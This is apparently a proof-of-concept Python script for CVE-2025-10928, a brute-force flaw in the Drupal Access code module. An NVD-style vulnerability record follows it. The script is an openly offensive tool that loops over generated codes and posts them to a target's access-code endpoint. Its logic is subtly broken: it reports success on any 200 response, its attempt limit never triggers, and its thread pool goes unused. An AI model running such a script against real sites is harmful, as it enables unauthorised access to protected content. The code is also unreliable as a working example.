CVE-2025-10928

# CVE-2025-10928 Drupal Access code Brute Force PoC # Affected: Drupal Access code module < 2.0.5 import requests import itertools import string from concurrent.futures import ThreadPoolExecutor TARGET_URL = "https://target-site.com/drupal/access-code" MAX_ATTEMPTS = 10000 THREADS = 10 def try_access_code(code): """ Try a single access code against the Drupal Access code endpoint. Returns True if the code is valid, False otherwise. """ try: response = requests.post( TARGET_URL, data={'access_code': code}, timeout=10, allow_redirects=False ) # Check for successful authentication indicators if response.status_code == 200: if 'access granted' in response.text.lower() or response.status_code != 401: print(f"[!] Valid access code found: {code}") return True return False except Exception as e: print(f"[-] Error trying {code}: {e}") return False def brute_force_attack(): """ Perform brute force attack on Drupal Access code module. Generates alphanumeric codes and tests them against the target. """ chars = string.ascii_letters + string.digits # Generate candidate codes (in production, use more sophisticated generation) for length in range(4, 9): for code_tuple in itertools.product(chars, repeat=length): code = ''.join(code_tuple) if try_access_code(code): print(f"[+] SUCCESS: Access code is {code}") return code if len(code) >= MAX_ATTEMPTS: break print("[-] No valid access code found within attempt limit") return None def main(): print(f"[*] Starting CVE-2025-10928 brute force attack") print(f"[*] Target: {TARGET_URL}") print(f"[*] Max attempts: {MAX_ATTEMPTS}") # Using thread pool for parallel requests with ThreadPoolExecutor(max_workers=THREADS) as executor: result = brute_force_attack() if result: print(f"[+] Attack successful! Valid code: {result}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-10928", "sourceIdentifier": "[email protected]", "published": "2025-10-30T00:15:34.060", "lastModified": "2025-12-12T17:54:27.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts vulnerability in Drupal Access code allows Brute Force.This issue affects Access code: from 0.0.0 before 2.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:access_code_project:access_code:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "2.0.5", "matchCriteriaId": "ADE0F040-9E8F-4CA4-B3F3-78C46F9B3DAA"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-108", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}